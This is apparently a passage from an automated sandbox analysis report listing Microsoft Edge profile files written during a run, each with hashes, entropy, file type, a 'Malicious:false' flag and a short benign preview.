                                                                                                                                                                                                                                                                        SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\65b261c4-610a-4735-9982-0a316e453931.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                        MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                        SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                        SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                        SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3ceea.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c875f87b-3144-4749-b683-c1328ac9c5d2.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):422
                                                                                                                                                                                                                                                                        Entropy (8bit):5.194102836489749
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:BXi+v4YebvqBZFUt8Cc/+C5V5LYebvqBaJ:J4Yebvyg8pLYebvL
                                                                                                                                                                                                                                                                        MD5:6FEA4BDD301EBDC5B6AB1DD1D9AFE8D3
                                                                                                                                                                                                                                                                        SHA1:F35093DDC8B3625B250868B120ABD0BBB6941843
                                                                                                                                                                                                                                                                        SHA-256:269B56B3CAF8CF2C709E330B4AB2FB5FCE7B85DC592F43B0FE2CCF37F56CA7FE
                                                                                                                                                                                                                                                                        SHA-512:002F2308171D77FB6EAE3E4058A31F83D013A2D7470C391BCBFFB9A813ADD56414CB94C8D65EDD24B5604365CB7AAEAA529296151F05D6924444B497D9CED5D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:50.349 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-02:20:50.350 1cbc Recovering log #3.2024/12/27-02:20:50.353 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):422
                                                                                                                                                                                                                                                                        Entropy (8bit):5.194102836489749
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:BXi+v4YebvqBZFUt8Cc/+C5V5LYebvqBaJ:J4Yebvyg8pLYebvL
                                                                                                                                                                                                                                                                        MD5:6FEA4BDD301EBDC5B6AB1DD1D9AFE8D3
                                                                                                                                                                                                                                                                        SHA1:F35093DDC8B3625B250868B120ABD0BBB6941843
                                                                                                                                                                                                                                                                        SHA-256:269B56B3CAF8CF2C709E330B4AB2FB5FCE7B85DC592F43B0FE2CCF37F56CA7FE
                                                                                                                                                                                                                                                                        SHA-512:002F2308171D77FB6EAE3E4058A31F83D013A2D7470C391BCBFFB9A813ADD56414CB94C8D65EDD24B5604365CB7AAEAA529296151F05D6924444B497D9CED5D5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:50.349 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-02:20:50.350 1cbc Recovering log #3.2024/12/27-02:20:50.353 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                        Entropy (8bit):5.150928902804912
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+zVq2P923oH+TcwtpIFUt8PF+zgZmw+PF+zIkwO923oH+Tcwta/WLJ:TVv4YebmFUt8og/+oI5LYebaUJ
                                                                                                                                                                                                                                                                        MD5:D7191E7B60505C92D2F7C879E4579FDE
                                                                                                                                                                                                                                                                        SHA1:B6D337BDDB7BA2EF53954B5994C28E80DF3D4B6C
                                                                                                                                                                                                                                                                        SHA-256:93B736158DFB1F1EC8E6A8E397A30F9D712AB88342F1FA4B44F5A02575616560
                                                                                                                                                                                                                                                                        SHA-512:9212A9C0B90747E67587E2BA166D9E04B9E60AE362DEE395EE9590586C504E44C063BA985A9B9C8802EED1EDDAE76A783CCC838405B5D59D2FB15A167225532C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.738 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-02:20:31.738 440 Recovering log #3.2024/12/27-02:20:31.738 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                        Entropy (8bit):5.150928902804912
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+zVq2P923oH+TcwtpIFUt8PF+zgZmw+PF+zIkwO923oH+Tcwta/WLJ:TVv4YebmFUt8og/+oI5LYebaUJ
                                                                                                                                                                                                                                                                        MD5:D7191E7B60505C92D2F7C879E4579FDE
                                                                                                                                                                                                                                                                        SHA1:B6D337BDDB7BA2EF53954B5994C28E80DF3D4B6C
                                                                                                                                                                                                                                                                        SHA-256:93B736158DFB1F1EC8E6A8E397A30F9D712AB88342F1FA4B44F5A02575616560
                                                                                                                                                                                                                                                                        SHA-512:9212A9C0B90747E67587E2BA166D9E04B9E60AE362DEE395EE9590586C504E44C063BA985A9B9C8802EED1EDDAE76A783CCC838405B5D59D2FB15A167225532C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.738 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-02:20:31.738 440 Recovering log #3.2024/12/27-02:20:31.738 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                        Entropy (8bit):1.265495754907874
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVumK:Bq+n0JX9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                        MD5:E6736A04C341B6E15AD98A4CB315D61F
                                                                                                                                                                                                                                                                        SHA1:8130F1C1BA4B4CC72DEB77BE39853F75C3DD5005
                                                                                                                                                                                                                                                                        SHA-256:8D48A427B9E34860CE36D0AEAA7DC44788093085BE22AB2A766CFB580A11384B
                                                                                                                                                                                                                                                                        SHA-512:A93F7D721E87A1A35B0D40AD19514E09DD636C52C90E612E68FEDA231A1B42E1012F90F19AFEF35B03DA9FE2DB8F4D0F819540877A328D76E1506F2E03E681EE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                        Entropy (8bit):0.4670843457419867
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0tvKJ:v7doKsKuKZKlZNmu46yjx0FU
                                                                                                                                                                                                                                                                        MD5:086449FECCB5F5F2668D8FF2FFBD6C86
                                                                                                                                                                                                                                                                        SHA1:FE946FF56C843013976A7E3E006488722286C2A9
                                                                                                                                                                                                                                                                        SHA-256:3733191107017EA4C846AAEBDB6D96D23FA89A724438365274F57BCAE8928B94
                                                                                                                                                                                                                                                                        SHA-512:623A27B484D44C015201FDE1F913202C8D618624F1C9B413BB2D49848821A92982D03F253BF1A09B4BB80053BB08B888FF620AD67FCC6856192564AF2BDD6A45
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\afacd532-2026-431f-866f-9ab125098345.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40504
                                                                                                                                                                                                                                                                        Entropy (8bit):5.561724295372579
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:JmQwrcqq7pLGLhThWPuMfye8F1+UoAYDCx9Tuqh0VfUC9xbog/OVtG1+tYnrwAfb:JmQwrcqCchThWPuMfyeu1jaEG1oY0Afb
                                                                                                                                                                                                                                                                        MD5:3E73F332FA3780975B273F12094D4256
                                                                                                                                                                                                                                                                        SHA1:567007C5373F32DECD70C11A777F716AC7B95A7A
                                                                                                                                                                                                                                                                        SHA-256:F0D7553771CC5309A021951B1D63C2DB1D38618D9BA529494C76FC8A401CDA52
                                                                                                                                                                                                                                                                        SHA-512:881CFD97C939315646B2BC0ADC02975DBBD460C930B5077EE717FF6995FADD05F5707C52C43C84AA15CE26AC59CBA4C34D893C64B9D8F006344E8C99DC3510C1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379757631686215","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379757631686215","location":5,"ma

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c556fb3b-8c1d-4df0-b0d6-49f1eab3066d.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ce3b4042-c1ce-4144-b0e0-2f70dc14b049.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (17811), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17815
                                                                                                                                                                                                                                                                        Entropy (8bit):5.496326215661839
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:stBPGQSu4hsBoTfhxCtz3k4bGhQwF6WTlaTY8:szOXuXMfENbGSCNaTY8
                                                                                                                                                                                                                                                                        MD5:4A720AB2344E085748D06D3527665859
                                                                                                                                                                                                                                                                        SHA1:3C621A17F9EBFF328487D12EE984E52CF33E037E
                                                                                                                                                                                                                                                                        SHA-256:C39B8AAE982F81FB4E49FB5B9746075EC47200ABF63E96FFCB85C4BC52990ADE
